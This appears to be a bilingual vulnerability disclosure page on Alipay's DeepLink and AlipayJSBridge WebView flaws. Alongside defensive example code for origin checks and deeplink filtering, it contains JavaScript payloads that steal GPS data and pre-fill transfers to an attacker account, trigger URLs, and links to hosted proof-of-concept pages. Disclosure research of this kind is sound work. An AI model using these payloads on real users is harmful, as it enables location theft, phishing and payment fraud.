<span class="en"><strong>DNB Netherlands Central Bank</strong> — Email received and being processed</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>Additional CVE submission</strong>: an additional CVE request was submitted to MITRE for newly discovered security issues in the Alipay app (details withheld for now)</span>
<span class="en"><strong>Additional CVE Submission</strong> — New CVE application submitted to MITRE for additional security issues discovered in the Alipay application (details withheld pending assignment)</span>
</p>
</div>
</div>
</section>
<!-- ==================== 2. EXECUTIVE SUMMARY ==================== -->
<section id="summary">
<h2><span class="num">02</span>
<span class="zh">Executive Summary</span>
<span class="en">Executive Summary</span>
</h2>
<div class="zh">
<p>Alipay's <code>alipays://</code> DeepLink scheme allows any third-party app or web page to send the user into Alipay's Nebula WebView container and load an <strong>attacker-controlled external web page</strong>. Once it is loaded, the attacker's JavaScript can call the <code>AlipayJSBridge</code> API to perform a series of dangerous operations:</p>
<ul>
<li><strong>Steal the precise GPS location</strong>: if the user has already granted Alipay location permission, an external page calling getLocation gets the coordinates with no second confirmation dialog, and they go straight to the attacker's server</li>
<li><strong>Steal the complete device fingerprint</strong>: brand / model / OS / storage / battery / Bluetooth / WiFi / permission states, 30+ fields</li>
<li><strong>Open the transfer page with the attacker's payee account and amount pre-filled</strong> (the final confirmation still requires a user tap, but combined with UI spoofing this greatly lowers the user's guard)</li>
<li><strong>Trigger the payment SDK to show the payment UI</strong>: the tradePay API brings up the cashier; the user must still confirm manually, but the UI can be closely imitated</li>
<li><strong>Jump to 18 sensitive internal pages</strong>: transaction history, bank card management, Zhima Credit, withdrawal, family accounts, etc.</li>
<li><strong>Display fake transfer notifications</strong>: forge "Transfer ¥5,000 to Zhang*Ming completed" inside Alipay</li>
<li><strong>Change the title bar to "Security Center"</strong>: makes the phishing more credible</li>
<li><strong>Redirect to the Alipay login page</strong>: a perfect credential-phishing entry point</li>
<li><strong>Chain-load further malicious pages</strong>: every new page can again call the full API</li>
</ul>
<p>The bar for the attack is extremely low: <strong>the victim only needs to click one link</strong>. No root, no jailbreak, no app to install. The link can spread through SMS, WeChat, QQ, email, QR codes or any other channel.</p>
</div>
<div class="en">
<p>Alipay's <code>alipays://</code> DeepLink scheme allows any third-party app or webpage to direct users into Alipay's Nebula WebView container, loading <strong>attacker-controlled external web pages</strong>. Once loaded, the attacker's JavaScript can call <code>AlipayJSBridge</code> APIs to perform dangerous operations:</p>
<ul>
<li><strong>Steal precise GPS location</strong> — When location permission is already granted to Alipay, external pages calling getLocation get coordinates with no secondary consent dialog, sent directly to attacker server</li>
<li><strong>Steal complete device fingerprint</strong> — Brand/model/OS/storage/battery/Bluetooth/WiFi/permissions, 30+ fields</li>
<li><strong>Open transfer page with pre-filled attacker account and amount</strong> (final confirmation still requires user tap, but combined with UI spoofing can greatly reduce vigilance)</li>
<li><strong>Trigger payment SDK to launch payment UI</strong> — tradePay API invokes cashier (user must still confirm, but UI can be highly spoofed)</li>
<li><strong>Navigate to 18 sensitive internal pages</strong> — Transaction history, bank cards, credit score, withdrawal, family accounts, etc.</li>
<li><strong>Display fake transfer notifications</strong> — Forge "Transfer CNY 5,000 to Zhang*Ming completed" inside Alipay</li>
<li><strong>Spoof title bar to "Security Center"</strong> — Enhance phishing credibility</li>
<li><strong>Redirect to Alipay login page</strong> — Create perfect credential phishing entry point</li>
<li><strong>Chain-load more malicious pages</strong> — Each new page can call all APIs again</li>
</ul>
<p>Attack prerequisites are minimal: <strong>victim only needs to click one link</strong>. No root, no jailbreak, no app installation required. The link can be distributed via SMS, WeChat, QQ, email, QR codes, or any other channel.</p>
</div>
</section>
<!-- ==================== 3. ATTACK CHAIN ==================== -->
<section id="chain">
<h2><span class="num">03</span>
<span class="zh">Attack Chain Details</span>
<span class="en">Attack Chain Details</span>
</h2>
<h3>
<span class="zh">Chain A: web link → WebView → JSBridge → data theft + transfer hijacking</span>
<span class="en">Chain A: Web Link → WebView → JSBridge → Data Theft + Transfer Hijacking</span>
</h3>
<div class="attack-chain">
<div class="chain-step">
<div class="chain-num">1</div>
<div>
<strong>
<span class="zh">Attacker deploys a malicious page</span>
<span class="en">Attacker deploys malicious page</span>
</strong>
<p>
<span class="zh">Deploy the PoC page (e.g. <code>https://innora.ai/zfb/poc/verify.html</code>) and a data-collection endpoint on any public HTTPS server</span>
<span class="en">Deploy PoC page (e.g., <code>https://innora.ai/zfb/poc/verify.html</code>) and data collection endpoint on any public HTTPS server</span>
</p>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">2</div>
<div>
<strong>
<span class="zh">Send the phishing link to the victim</span>
<span class="en">Send phishing link to victim</span>
</strong>
<p>
<span class="zh">Send the link via SMS / WeChat / QQ, etc. The victim taps it in the phone browser and sees a social-engineering page such as "Congratulations, you've won a ¥88 red packet"</span>
<span class="en">Send link via SMS/WeChat/QQ. Victim clicks in mobile browser, sees social engineering page like "Congratulations! You won a ¥88 red packet"</span>
</p>
<div class="evidence-box">
<div class="label">Trigger URL</div>
<code>intent://platformapi/startapp?appId=20000067&amp;url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html#Intent;scheme=alipays;package=com.eg.android.AlipayGphone;end</code>
</div>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">3</div>
<div>
<strong>
<span class="zh">Alipay WebView loads the external page</span>
<span class="en">Alipay WebView loads external page</span>
</strong>
<p>
<span class="zh">Chrome hands off to Alipay through the <code>intent://</code> scheme. Alipay's Nebula WebView container loads the attacker's page and <code>AlipayJSBridge</code> is injected automatically. A "Continue to visit" warning is shown, but it <strong>does not tell</strong> the user that the external page will receive JSBridge API access.</span>
<span class="en">Chrome triggers Alipay via <code>intent://</code> scheme. Alipay's Nebula WebView loads the attacker page. <code>AlipayJSBridge</code> is automatically injected. A "Continue to visit" warning appears (but does <strong>NOT</strong> inform the user that the external page will gain JSBridge API access).</span>
</p>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">4</div>
<div>
<strong>
<span class="zh">The JavaScript payload runs automatically</span>
<span class="en">JavaScript Payload executes automatically</span>
</strong>
<p>
<span class="zh">The attacker's JS calls AlipayJSBridge APIs:</span>
<span class="en">Attacker JS calls AlipayJSBridge APIs:</span>
</p>
<pre><code>// GPS location theft
AlipayJSBridge.call("getLocation", {}, function(result) {
  // result = {lat: "[redacted]", lng: "[redacted]", city: "Penang"}
  exfiltrate("GPS", result); // POST to attacker server
});
// Open the transfer page with the attacker's account pre-filled
AlipayJSBridge.call("startApp", {
  appId: "09999988",
  param: {
    actionType: "toAccount",
    account: "attacker@evil.com",
    amount: "1000"
  }
});
// Display a fake transfer notification
AlipayJSBridge.call("toast", {
  content: "Transfer ¥5,000 to Zhang*Ming completed",
  type: "success",
  duration: 5000
});</code></pre>
</div>
</div>
<div class="chain-arrow"></div>
<div class="chain-step">
<div class="chain-num">5</div>
<div>
<strong>
<span class="zh">Data exfiltrated to the attacker's server</span>
<span class="en">Data exfiltrated to attacker server</span>
</strong>
<p>
<span class="zh">The stolen GPS, device information and session data are sent to the attacker's server over two channels, XHR POST plus an image beacon. <strong>308 complete log entries are on record.</strong></span>
<span class="en">GPS, device info, and session data sent to attacker server via dual-channel XHR POST + Image Beacon. <strong>308 complete log entries recorded.</strong></span>
</p>
</div>
</div>
</div>
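<p>The summary and Chain A both turn on one fact: the bridge is injected into whatever page the container loads, and nothing asks which origin is calling. An added example (not Alipay's code) of the gate that is missing, in JavaScript: each call is authorized against the origin of the executing document, sensitive APIs such as getLocation and tradePay are never reachable from a third-party page, and every refusal is logged. The policy table, the registered origin and the handler stubs are assumptions.</p>

```javascript
// Added example, not Alipay's code: route every bridge call through an origin check
// before it reaches a native handler. The policy table, the registered origin, the
// handler stubs and all function names are assumptions; the API names (getLocation,
// tradePay, startApp, scan, chooseImage, share, toast, setTitle) are the ones the page
// shows external pages calling.

// The vendor's domain (from the page). The check must use the origin of the document
// actually executing, never the host in the deeplink: the page shows that host can be
// an open redirector while the loaded document belongs to someone else.
const FIRST_PARTY_SUFFIX = ".alipay.com";

// APIs that read user data or start payment/device flows: never for third-party pages.
const SENSITIVE_APIS = new Set(["getLocation", "tradePay", "startApp", "scan", "chooseImage", "share"]);
// APIs that draw vendor-styled UI; a third party may only have them by declaration.
const UI_APIS = new Set(["toast", "showToast", "setTitle"]);
// Scopes a registered developer declared for its origin (constructed sample).
const REGISTERED_SCOPES = new Map([["https://merchant.example", new Set(["toast"])]]);

const auditLog = []; // every denied call, for detection and follow-up

function isFirstParty(origin) {
  let url;
  try { url = new URL(origin); } catch (_e) { return false; }
  if (url.protocol !== "https:") return false; // no bridge for plaintext pages
  const h = url.hostname.toLowerCase();
  return h === FIRST_PARTY_SUFFIX.slice(1) || h.endsWith(FIRST_PARTY_SUFFIX);
}

// Decide whether a document at `origin` may call `api`.
function authorize(origin, api) {
  if (isFirstParty(origin)) return { allowed: true, reason: "first-party origin" };
  if (SENSITIVE_APIS.has(api)) return { allowed: false, reason: "sensitive API, third-party origin" };
  const scope = REGISTERED_SCOPES.get(origin);
  if (scope && scope.has(api)) return { allowed: true, reason: "declared scope" };
  if (UI_APIS.has(api)) return { allowed: false, reason: "UI API outside declared scope" };
  return { allowed: false, reason: "unregistered origin or unknown API" };
}

// Stand-ins for the native implementations (constructed).
const HANDLERS = {
  getLocation: () => ({ lat: "[redacted]", lng: "[redacted]" }),
  tradePay: () => ({ cashier: "opened" }),
  toast: (p) => ({ shown: String(p.content) }),
  setTitle: (p) => ({ title: String(p.title) }),
};

// What the injected bridge would run for AlipayJSBridge.call(api, params, cb):
// authorize first, log a refusal, and only then touch native code.
function dispatch(origin, api, params = {}) {
  const verdict = authorize(origin, api);
  if (!verdict.allowed) {
    auditLog.push({ origin, api, reason: verdict.reason });
    return { error: "forbidden", reason: verdict.reason };
  }
  const handler = HANDLERS[api];
  return handler ? handler(params) : { error: "unknown api" };
}
```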
<h3>
<span class="zh">Chain B: zero-interaction DeepLink → direct exposure of sensitive pages</span>
<span class="en">Chain B: Zero-Interaction DeepLink → Sensitive Page Direct Exposure</span>
</h3>
<div class="zh">
<p>When the following DeepLinks are triggered from a browser or any third-party app, Alipay <strong>shows no additional warning</strong> and jumps straight to the sensitive function page:</p>
</div>
<div class="en">
<p>The following DeepLinks, when triggered from a browser or any third-party app, cause Alipay to navigate <strong>without any additional warning</strong> directly to sensitive function pages:</p>
</div>
<table>
<tr>
<th>appId</th>
<th>
<span class="zh">目标页面</span><span class="en">Target Page</span>
</th>
<th>
<span class="zh">暴露数据</span><span class="en">Exposed Data</span>
</th>
</tr>
<tr><td><code>20000003</code></td>
<td><span class="zh">交易记录</span><span class="en">Transaction History</span></td>
<td><span class="zh">完整消费历史(商品名、金额、分类)</span><span class="en">Full spending history (items, amounts, categories)</span></td>
</tr>
<tr><td><code>20000116</code></td>
<td><span class="zh">转账联系人</span><span class="en">Transfer Contacts</span></td>
<td><span class="zh">20+ 联系人真实姓名、头像、转账金额</span><span class="en">20+ contacts' real names, avatars, transfer amounts</span></td>
</tr>
<tr><td><code>20000123</code></td>
<td><span class="zh">收款二维码</span><span class="en">Payment QR Code</span></td>
<td><span class="zh">完整收款码 + 真实姓名</span><span class="en">Full payment QR + real name</span></td>
</tr>
<tr><td><code>20000032</code></td>
<td><span class="zh">余额宝</span><span class="en">Yu'E Bao (Money Market)</span></td>
<td><span class="zh">余额 ¥5.00 + 累计收益 ¥9,453.67</span><span class="en">Balance ¥5.00 + total earnings ¥9,453.67</span></td>
</tr>
<tr><td><code>20000180</code></td>
<td><span class="zh">总资产</span><span class="en">Total Assets</span></td>
<td><span class="zh">完整资产概览</span><span class="en">Complete asset overview</span></td>
</tr>
<tr><td><code>20000153</code></td>
<td><span class="zh">芝麻信用</span><span class="en">Zhima Credit Score</span></td>
<td><span class="zh">信用评分</span><span class="en">Credit score</span></td>
</tr>
<tr><td><code>20000193</code></td>
<td><span class="zh">银行卡管理</span><span class="en">Bank Card Management</span></td>
<td><span class="zh">绑定的银行卡信息</span><span class="en">Linked bank card info</span></td>
</tr>
<tr><td><code>09999988</code></td>
<td><span class="zh">转账</span><span class="en">Transfer</span></td>
<td><span class="zh">可预填攻击者收款账号和金额</span><span class="en">Can pre-fill attacker account and amount</span></td>
</tr>
<tr><td><code>20000033</code></td>
<td><span class="zh">提现</span><span class="en">Withdrawal</span></td>
<td><span class="zh">提现页面</span><span class="en">Withdrawal page</span></td>
</tr>
<tr><td><code>20000221</code></td>
<td><span class="zh">亲情号</span><span class="en">Family Account</span></td>
<td><span class="zh">亲情号列表</span><span class="en">Family account list</span></td>
</tr>
<tr><td><code>68687023</code></td>
<td><span class="zh">花呗</span><span class="en">Huabei (Credit)</span></td>
<td><span class="zh">花呗页面</span><span class="en">Credit page</span></td>
</tr>
<tr><td><code>10000007</code></td>
<td><span class="zh">扫一扫</span><span class="en">Scan</span></td>
<td><span class="zh">触发摄像头权限</span><span class="en">Triggers camera permission</span></td>
</tr>
</table>
<div class="evidence-box">
<div class="label">
<span class="zh">触发方式</span><span class="en">Trigger Method</span>
</div>
<pre><code>// From any app or browser:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse("alipays://platformapi/startapp?appId=20000003"));
startActivity(i);
// Alipay opens transaction history directly. No warning.</code></pre>
</div>
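<p>As an added example (not Alipay's code and not part of the original research), here is a default-deny dispatcher for the <code>alipays://platformapi/startapp</code> links in the table above: it parses the link, classifies the appId by what the page exposes, refuses untrusted <code>url=</code> targets for the H5 container (<code>20000067</code>) instead of showing a bare "Continue to visit" dialog, and strips externally supplied pre-fill parameters before any interstitial. The tier names, the trusted-host list, the shape of <code>source</code> and the function names are assumptions.</p>

```javascript
// Added example, not Alipay's code: a default-deny dispatcher for
// alipays://platformapi/startapp links arriving from another app or a
// browser. appId tiers come from the table above; everything else
// (function names, trusted hosts, the "confirm" interstitial) is assumed.

const APP_TIERS = {
  "20000003": "financial-data",  // transaction history
  "20000116": "financial-data",  // transfer contacts
  "20000123": "financial-data",  // payment QR + real name
  "20000032": "financial-data",  // Yu'E Bao
  "20000180": "financial-data",  // total assets
  "20000153": "financial-data",  // Zhima credit score
  "20000193": "financial-data",  // bank card management
  "20000221": "financial-data",  // family account
  "68687023": "financial-data",  // Huabei
  "09999988": "money-movement",  // transfer (accepts account/amount)
  "20000033": "money-movement",  // withdrawal
  "10000007": "device-access",   // scan (camera)
  "20000067": "h5-container",    // loads url= with AlipayJSBridge injected
};

// Hosts allowed inside the privileged H5 container (constructed allowlist).
const TRUSTED_H5_HOSTS = new Set(["example.alipay.com"]);

// Query parameters an external caller must never pre-fill
// (the V-01 chain pre-fills account and amount on the transfer page).
const PREFILL_PARAMS = new Set(["actionType", "account", "amount"]);

// Parse an alipays://platformapi/startapp?... link; null if it is not one.
function parseStartApp(link) {
  let u;
  try { u = new URL(link); } catch (e) { return null; }
  if (u.protocol !== "alipays:" || u.host !== "platformapi" || u.pathname !== "/startapp") {
    return null;
  }
  const params = Object.fromEntries(u.searchParams.entries());
  return params.appId ? { appId: params.appId, params } : null;
}

// source = { external: boolean, packageName: string|null }, i.e. the
// startFromExternal / sourcePackageName pair seen in getStartupParams.
// Returns { action: "open" | "confirm" | "deny", reason, params[, stripped] }.
function dispatchDeepLink(link, source) {
  const parsed = parseStartApp(link);
  if (!parsed) return { action: "deny", reason: "not a well-formed startapp link", params: {} };
  const { appId, params } = parsed;
  const tier = APP_TIERS[appId] || "unknown";

  // In-app navigation keeps its current behaviour.
  if (!source.external) return { action: "open", reason: "internal navigation", params };

  if (tier === "h5-container") {
    let target = null;
    try { target = new URL(params.url || ""); } catch (e) { /* treated as untrusted */ }
    if (!target || target.protocol !== "https:" || !TRUSTED_H5_HOSTS.has(target.hostname)) {
      // The page would receive AlipayJSBridge: refuse outright rather than
      // show a warning that does not explain what access is granted.
      return { action: "deny", reason: "untrusted url for privileged H5 container", params };
    }
    return { action: "open", reason: "trusted H5 host", params };
  }

  // External callers never get to pre-fill money-movement fields.
  const sanitized = { ...params };
  const stripped = [];
  for (const k of Object.keys(params)) {
    if (PREFILL_PARAMS.has(k)) { delete sanitized[k]; stripped.push(k); }
  }
  // Financial data, money movement, device access and unclassified pages
  // all go through an interstitial naming the calling package and the page.
  return {
    action: "confirm",
    reason: `${tier} page requested by ${source.packageName}`,
    params: sanitized,
    stripped,
  };
}
```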
</section>
<!-- ==================== 3.5 LIVE PoC ==================== -->
<section id="poc">
<h2><span class="num">03.5</span>
<span class="zh">在线 PoC 演示</span>
<span class="en">Live PoC Demonstration</span>
</h2>
<div class="zh">
<p>以下是可在线体验的 PoC 页面(已脱敏,不收集任何数据):</p>
</div>
<div class="en">
<p>Below are live PoC pages you can test (sanitized, no data collection):</p>
</div>
<div class="card" style="border-left: 4px solid var(--purple);">
<h3>
<span class="zh">Trigger 页面 — 模拟钓鱼入口</span>
<span class="en">Trigger Page — Simulated Phishing Entry</span>
</h3>
<p>
<span class="zh">模拟攻击者通过短信/微信发送的钓鱼页面。在安装了支付宝的 Android 手机上用 Chrome 打开即可体验。</span>
<span class="en">Simulates the phishing page an attacker would send via SMS/WeChat. Open in Chrome on an Android phone with Alipay installed.</span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/trigger.html" style="color: var(--purple); font-weight: 600;">https://innora.ai/zfb/poc/trigger.html</a>
</div>
</div>
<div class="card" style="border-left: 4px solid var(--blue);">
<h3>
<span class="zh">JSBridge PoC — 数据采集演示</span>
<span class="en">JSBridge PoC — Data Collection Demo</span>
</h3>
<p>
<span class="zh">在支付宝 WebView 中加载后,演示 AlipayJSBridge API 可以获取的所有数据。<strong>所有数据仅在本地显示,不发送到任何服务器。</strong></span>
<span class="en">When loaded inside Alipay WebView, demonstrates all data accessible via AlipayJSBridge APIs. <strong>All data is displayed locally only, not sent to any server.</strong></span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/verify.html" style="color: var(--blue); font-weight: 600;">https://innora.ai/zfb/poc/verify.html</a>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">触发方式</span><span class="en">Trigger Method</span>
</div>
<code style="font-size: 12px; color: var(--text2);">alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html</code>
</div>
</div>
<div class="card" style="border-left: 4px solid var(--green);">
<h3>
<span class="zh">Chain WebView — 链式加载演示</span>
<span class="en">Chain WebView — Chain Loading Demo</span>
</h3>
<p>
<span class="zh">证明通过 pushWindow 链式加载的页面同样获得完整 JSBridge 访问权限。</span>
<span class="en">Proves that pages chain-loaded via pushWindow also receive full JSBridge access.</span>
</p>
<div class="evidence-box">
<div class="label">URL</div>
<a href="https://innora.ai/zfb/poc/chain.html" style="color: var(--green); font-weight: 600;">https://innora.ai/zfb/poc/chain.html</a>
</div>
</div>
</section>
<!-- ==================== 4. VERIFIED ISSUES ==================== -->
<section id="vulns">
<h2><span class="num">04</span>
<span class="zh">已验证安全问题</span>
<span class="en">Verified Security Issues</span>
</h2>
<div class="zh">
<p>以下所有问题均在真实设备上端到端验证,有服务器日志和截图为证。我们对每个发现都标注了验证状态和证据类型。</p>
</div>
<div class="en">
<p>All issues below were verified end-to-end on real devices, with server logs and screenshots as evidence. Each finding includes verification status and evidence type.</p>
</div>
<!-- V-01 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-01: <span class="zh">转账页面预填攻击者账号</span><span class="en">Transfer Page Pre-filled with Attacker Account</span></h3>
<p>
<span class="zh"><code>startApp</code> API 允许外部页面打开支付宝转账页面,并预填收款账号和转账金额。受害者看到的是一个已经填好攻击者账号的转账界面。最终转账仍需用户点击确认按钮,但配合 UI 欺骗（V-08）和社会工程,用户误操作的风险极高。</span>
<span class="en">The <code>startApp</code> API allows external pages to open Alipay's transfer page with pre-filled recipient account and amount. The victim sees a transfer form already populated with the attacker's account. Final transfer still requires user confirmation, but combined with UI spoofing (V-08) and social engineering, the risk of user error is extremely high.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_startApp:转账预填(09999988)",
"data":{"status":"ok","result":{"success":true}}}</code></pre>
</div>
<p><strong>API:</strong> <code>AlipayJSBridge.call("startApp", {appId:"09999988", param:{actionType:"toAccount", account:"attacker@evil.com", amount:"1000"}})</code></p>
</div>
<!-- V-02 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-02: <span class="zh">pushWindow 执行转账 DeepLink</span><span class="en">pushWindow Executes Transfer DeepLink</span></h3>
<p>
<span class="zh"><code>pushWindow</code> API 允许外部页面通过 <code>alipays://</code> scheme 执行转账 DeepLink,传递攻击者账号和金额。</span>
<span class="en">The <code>pushWindow</code> API allows external pages to execute transfer DeepLinks via the <code>alipays://</code> scheme, passing attacker account and amount.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_pushWindow:transfer_scheme",
"data":{"status":"ok","result":{"success":"true"}}}</code></pre>
</div>
</div>
<!-- V-03 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-03: <span class="zh">pushWindow 打开支付收银台</span><span class="en">pushWindow Opens Payment Cashier</span></h3>
<p>
<span class="zh">外部页面可以通过 <code>pushWindow</code> 打开支付宝的支付收银台 URL。</span>
<span class="en">External pages can open Alipay's payment cashier URL via <code>pushWindow</code>.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_pushWindow:cashier(支付收银台)",
"data":{"status":"ok","result":{"success":"true"}}}</code></pre>
</div>
</div>
<!-- V-04 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-04: <span class="zh">tradePay 触发支付 SDK</span><span class="en">tradePay Triggers Payment SDK</span></h3>
<p>
<span class="zh"><code>tradePay</code> API 可以被外部页面调用,弹出支付宝支付界面。我们测试了 3 种参数格式,全部成功触发（resultCode=6001 表示用户手动取消,但支付界面确实弹出了）。</span>
<span class="en">The <code>tradePay</code> API can be called from external pages, launching the Alipay payment UI. We tested 3 parameter formats, all successfully triggered (resultCode=6001 means user manually cancelled, but the payment UI did appear).</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">服务器日志证据</span><span class="en">Server Log Evidence</span>
</div>
<pre><code>{"tag":"f_tradePay:full_orderStr",
"data":{"status":"ok","result":{"resultCode":"6001"}}}</code></pre>
</div>
</div>
<!-- V-05 -->
<div class="card card-critical">
<span class="severity sev-critical">CRITICAL</span>
<h3>V-05: <span class="zh">完整数据外传链路 (308条日志)</span><span class="en">Full Data Exfiltration Chain (308 Log Entries)</span></h3>
<p>
<span class="zh">外部页面中的 JavaScript 成功将 GPS 坐标、设备信息、网络信息、会话 ID 等数据通过 XHR POST + Image Beacon 双通道发送到攻击者服务器。总计 <strong>308 条</strong>完整日志记录。</span>
<span class="en">JavaScript in external pages successfully exfiltrated GPS coordinates, device info, network info, session IDs via dual-channel XHR POST + Image Beacon to attacker server. Total: <strong>308 complete log entries</strong>.</span>
</p>
</div>
<!-- V-06 to V-08 -->
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-06: <span class="zh">18个敏感内部页面可被外部页面跳转</span><span class="en">18 Sensitive Internal Pages Navigable from External Page</span></h3>
<p>
<span class="zh">通过 <code>startApp</code> API,外部页面可以跳转到包括交易记录、银行卡管理、芝麻信用、提现、亲情号在内的 18 个敏感内部页面,全部返回 <code>success: true</code>。</span>
<span class="en">Via the <code>startApp</code> API, external pages can navigate to 18 sensitive internal pages including transaction history, bank card management, credit score, withdrawal, and family accounts. All returned <code>success: true</code>.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-07: <span class="zh">GPS 精确定位窃取(无用户感知)</span><span class="en">GPS Location Theft (No User Awareness)</span></h3>
<p>
<span class="zh"><code>getLocation</code> API 在外部页面调用时,如果用户此前已授予支付宝位置权限,<strong>不显示任何二次确认弹窗</strong>,直接返回精确 GPS 坐标。已在 3 台设备上验证(新西兰 Android、马来西亚 Android、中国杭州 iOS)。注意:iOS 14+ 的模糊定位设置可能影响精度。</span>
<span class="en">When called from an external page, the <code>getLocation</code> API shows <strong>no secondary consent dialog</strong> if the user has previously granted Alipay location permission; it directly returns precise GPS coordinates. Verified on 3 devices (New Zealand Android, Malaysia Android, Hangzhou China iOS). Note: iOS 14+ approximate location settings may affect precision.</span>
</p>
<div class="evidence-box">
<div class="label">
<span class="zh">三台设备 GPS 数据</span><span class="en">GPS Data from 3 Devices</span>
</div>
<pre><code>// Samsung S25 Ultra — Auckland, New Zealand
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X — Penang, Malaysia
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro — Hangzhou, China (device of the vendor's security business lead; no GPS authorization statement or popup shown at any point)
// 3 test rounds, accuracy 17.4m → 8.8m (locationReducedAccuracy: 0, i.e. precise location); about 7 seconds from page load to exfiltration
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "杭州市"}</code></pre>
</div>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-08: <span class="zh">UI 欺骗: 虚假转账通知 + 标题篡改</span><span class="en">UI Spoofing: Fake Transfer Notifications + Title Bar Spoofing</span></h3>
<p>
<span class="zh">攻击者可在支付宝内显示任意 toast 消息(如 "转账 ¥5,000 到 张*明 成功"),并将标题栏修改为 "安全中心" / "红包领取" 等钓鱼标题。配合社会工程,受害者无法区分真假。</span>
<span class="en">Attacker can display arbitrary toast messages inside Alipay (e.g., "Transfer ¥5,000 to Zhang*Ming completed") and modify the title bar to "Security Center" / "Red Packet Claim." Combined with social engineering, victims cannot distinguish real from fake.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-09: <span class="zh">OAuth 授权流程劫持</span><span class="en">OAuth Authorization Flow Hijacking</span></h3>
<p>
<span class="zh"><code>getAuthCode</code> API 可被外部页面触发,发起 OAuth 服务端调用。虽然未成功获取授权码,但弹出了"服务忙,请稍后再试"弹窗,证明请求到达了 OAuth 服务端。</span>
<span class="en">The <code>getAuthCode</code> API can be triggered by external pages, initiating OAuth server-side calls. While no auth code was obtained, a "Service busy, please try later" popup appeared, proving the request reached the OAuth server.</span>
</p>
</div>
<div class="card card-high">
<span class="severity sev-high">HIGH</span>
<h3>V-10: <span class="zh">零交互暴露余额宝余额和转账联系人</span><span class="en">Zero-Interaction Exposure of Yu'E Bao Balance and Transfer Contacts</span></h3>
<p>
<span class="zh">通过 DeepLink 直接打开余额宝页面,显示余额 ¥5.00 和累计收益 ¥9,453.67。转账联系人页面暴露 20+ 联系人完整真实姓名。无需任何额外确认。</span>
<span class="en">DeepLink directly opens Yu'E Bao page showing balance ¥5.00 and total earnings ¥9,453.67. Transfer contacts page exposes 20+ contacts' full real names. No additional confirmation required.</span>
</p>
</div>
<!-- Full vulnerability table -->
<h3>
<span class="zh">完整问题列表</span>
<span class="en">Complete Issue List</span>
</h3>
<table>
<tr>
<th>ID</th>
<th>
<span class="zh">问题</span><span class="en">Issue</span>
</th>
<th>
<span class="zh">严重度</span><span class="en">Severity</span>
</th>
<th>
<span class="zh">验证</span><span class="en">Verified</span>
</th>
</tr>
<tr><td>V-01</td><td><span class="zh">startApp 预填攻击者账号到转账页面</span><span class="en">startApp pre-fills attacker account on transfer page</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-02</td><td><span class="zh">pushWindow 执行转账 DeepLink</span><span class="en">pushWindow executes transfer DeepLink</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-03</td><td><span class="zh">pushWindow 打开支付收银台</span><span class="en">pushWindow opens payment cashier</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-04</td><td><span class="zh">tradePay 触发支付 SDK</span><span class="en">tradePay triggers payment SDK</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-05</td><td><span class="zh">完整数据外传链路</span><span class="en">Full data exfiltration chain</span></td><td><span class="severity sev-critical">CRIT</span></td><td>308 logs</td></tr>
<tr><td>V-06</td><td><span class="zh">18个敏感页面可跳转</span><span class="en">18 sensitive pages navigable</span></td><td><span class="severity sev-high">HIGH</span></td><td>42 screenshots</td></tr>
<tr><td>V-07</td><td><span class="zh">GPS 精确定位窃取</span><span class="en">GPS location theft</span></td><td><span class="severity sev-high">HIGH</span></td><td>3 devices</td></tr>
<tr><td>V-08</td><td><span class="zh">UI 欺骗 (toast + 标题篡改)</span><span class="en">UI spoofing (toast + title bar)</span></td><td><span class="severity sev-high">HIGH</span></td><td>308 logs</td></tr>
<tr><td>V-09</td><td><span class="zh">OAuth 授权流程劫持</span><span class="en">OAuth flow hijacking</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-10</td><td><span class="zh">余额宝余额 + 联系人姓名暴露</span><span class="en">Yu'E Bao balance + contact names exposed</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-11</td><td><span class="zh">收款二维码 + 真实姓名泄露</span><span class="en">Payment QR + real name exposure</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
